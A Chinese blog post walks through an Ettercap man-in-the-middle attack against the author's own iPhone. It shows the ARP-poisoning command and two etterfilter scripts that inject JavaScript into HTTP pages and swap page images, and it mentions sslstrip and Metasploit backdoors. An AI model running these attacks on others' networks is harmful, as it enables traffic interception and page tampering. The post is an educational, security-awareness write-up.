Ettercap使用小结

发表于 | 分类于 | | 阅读次数

Ettercap简介:

ettercap是一个进行中间人攻击的全面工具套装,它可以嗅探数据和玩一些其他有意思的把戏…… 我从官网介绍上随意翻译的=_= # 一次中间人攻击实例 - 工具: Ettercap Wireshark - 攻击者:Mac OS X 10.10.5 - 目标:iPhone (iOS 9.1) ## step1 打开内核ip转发功能,否则会导致被攻击的对象无法上网。在终端里输入 

1
sudo sysctl net.inet.ip.forwarding=1

终端提示 

1
net.inet.ip.forwarding: 0 -> 1

这样就可以开始进行ARP毒化和中间人攻击了。(注意:这是Mac OS X系统的命令,Linux系统请自行Google) ## step2 ### 嗅探
ettercap提供了四种用户界面 

1
2
3
4
Text Only – ‘-T’ option
Curses – ‘-C’ option
GTK – ‘-G’ option
Daemon – ‘-D’ option

我使用的是命令行模式,感觉它UI做的好丑。
下面是ARP毒化的指令 

1
sudo ettercap -T -q -i en0 -M ARP:remote /192.168.1.4/ /192.168.1.1/

T参数是Text Only,q参数是安静模式,M参数表示MITM即中间人攻击。192.168.1.4是iPhone的ip地址,192.168.1.1是路由的ip地址。
使用该命令后,攻击开始,按q键结束。同时打开Wireshark即可看到目标访问的所有http链接的明文内容。如下图所示: ### 使用插件
在ettercap可以使用自己编写的插件来实现一些功能,当然ettercap也提供了一些插件。在/usr/local/bin/目录下用vim新建.filter文件。
我们先尝试注入代码让目标浏览网页时弹窗,代码如下: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
if (ip.proto == TCP && tcp.dst == 80)
{
    if (search(DATA.data, "Accept-Encoding"))
    {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80)
{
    replace("<head>", "<head><script type="text/javascript">alert('test');</script>");
    replace("<HEAD>", "<HEAD><script type="text/javascript">alert('test');</script>");
    msg("Injecting OK!!\n");
}

接着在终端中输入: 

1
etterfilter window.filter -o windowtest3.ef

简单解释下,可以输入etterfilter -h来获得帮助,o参数是输出文件名。
效果如下图所示: 再尝试下替换网页的图片试试,还是和上面一样直接上源码; 

1
2
3
4
5
6
7
8
9
10
11
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://img5.duitang.com/uploads/item/201507/22/20150722212458_YrGtd.jpeg\" ");
   replace("IMG SRC=", "img src=\"http://img5.duitang.com/uploads/item/201507/22/20150722212458_YrGtd.jpeg\" ");
   msg("Filter Ran.\n");
}

我找了个小埋的图片233,看看效果; 还可以通过插件来替换对方的下载内容,配合Metasploit生成后门甚至可以完全控制目标计算机。我还没测试过是否能用…… # 小结 中间人攻击和中间人毒化利用了ARP(地址解析协议)的固有漏洞,操作简单但是危害极大,原来我一直是主张计算机裸奔党,从来不用杀软。然而对于小白来说,喜欢乱点的同学们,你们真的需要杀毒软件来保护你们的电脑不被入侵。杀毒软件弹个窗请看清楚再关……
对了,突然想起来https协议就算是用ettercap+Wireshark也是看不到传输内容的,但是通过sslstrip就可以突破ssl获取密码了,以后有时间再进行测试吧,今天就写到这里。